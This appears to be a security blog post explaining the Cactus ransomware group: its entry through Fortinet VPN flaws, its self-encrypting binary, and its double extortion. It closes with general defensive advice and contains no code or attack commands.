Since March, a new ransomware gang called Cactus has been up to mischief in the digital world. The cybercriminals are particularly targeting VPN applications to gain initial access to the systems and networks. High-ranking companies are also increasingly being targeted and the gang is already demanding large ransoms. In our blog post, we explain how the Cactus ransomware works and what is known so far.
Table of Contents
What is Cactus ransomware?
Cyber criminals are known for constantly coming up with new ways to inject malware and compromise systems. This is also the case with ransomware: The security researchers from “BleepingComputer” have discovered a new sophisticated ransomware variant called “Cactus” . This mainly uses weaknesses in VPN applications to get into foreign networks. The special thing about it: The Cactus ransomware can apparently encrypt itself in order to make detection by antivirus software more difficult. Combating it with common antivirus programs is therefore difficult.
How does the new Cactus ransomware work?
Typically, ransomware uses malware to infect another system. After ransomware is finally loaded onto the other system, it encrypts access to files, software and programs. In this type of attack, the cyber criminals demand a ransom from the victims in exchange for decrypting the files.
What makes Cactus even more dangerous compared to other ransomware variants is that the attackers use encryption to protect the ransomware binary.
An attack focuses on vulnerabilities in known VPN servers from Fortinet. The cybercriminals access the network via the VPN server and execute a batch script that loads the actual ransomware. The malicious code is transmitted in a ZIP file and extracted after the download. Using a special key in the command line, the attackers can start the application and encrypt files on the affected system in such a way that users no longer have access.
Additional business model with Double Extortion
But that’s not all: before encryption, the files are transferred to the attackers’ servers. This allows the ransomware gang another leverage. Firstly, ransom money can be demanded for decrypting the files on the compromised system and additionally, the cyber criminals can threaten to publish the captured data. This is also mentioned in the Cactus ransomware ransom note.
Spread of ransomware Cactus
Ransomware Cactus mainly targets large companies with a lot of sensitive data, because these are more willing to pay larger ransom sums due to the high importance of the data. According to various reports, the claims for previous Cactus attacks are said to be in the millions and the attacks are specifically tailored to the respective victims. It is not yet known which companies have been affected by the Cactus attacks so far – no sensitive data has yet been published.
What is Cactus ransomware?
It is not yet known who is behind the new ransomware gang. The investigation is proceeding swiftly.
How to protect yourself from ransomware Cactus
Cactus ransomware is extremely dangerous, as common virus scanners have difficulty detecting it due to the encrypted attacks. But there are ways you can protect yourself from attacks.
- Updates: Get the latest software updates for your applications and keep public systems up to date
- Monitoring: Continuously monitor your network for abnormalities, especially PowerShell
- Password Manager: Implement a password manager to secure your access data even better
- 2FA: Use two-factor authentication
- Monitor access: Check administrator and service accounts
- Backups: Create regular backups to protect essential data
Cactus ransomware summary:
The cyber criminals behind Cactus ransomware have been active since at least March 2023. Ransomware Cactus is particularly dangerous because it encrypts itself and is therefore difficult to detect. This trick makes it possible for ransomware Cactus to bypass conventional antivirus scanners.
The main attack vectors are vulnerabilities in VPN applications. To avert danger, monitoring is to be emphasized in particular. For protection, it is therefore essential to use the latest software updates from the provider, continuously monitor your network and react quickly to any abnormalities.
Conclusion: Tricky ransomware Cactus spreads quickly
Ransomware remains a “never-ending story”: The new Cactus variant currently attacks primarily via Fortinet VPN servers. The “double blackmail” approach aims to achieve a higher ransom and the attacks are tailored specifically to the respective victim. Therefore, please note our tips on protection against ransomware Cactus.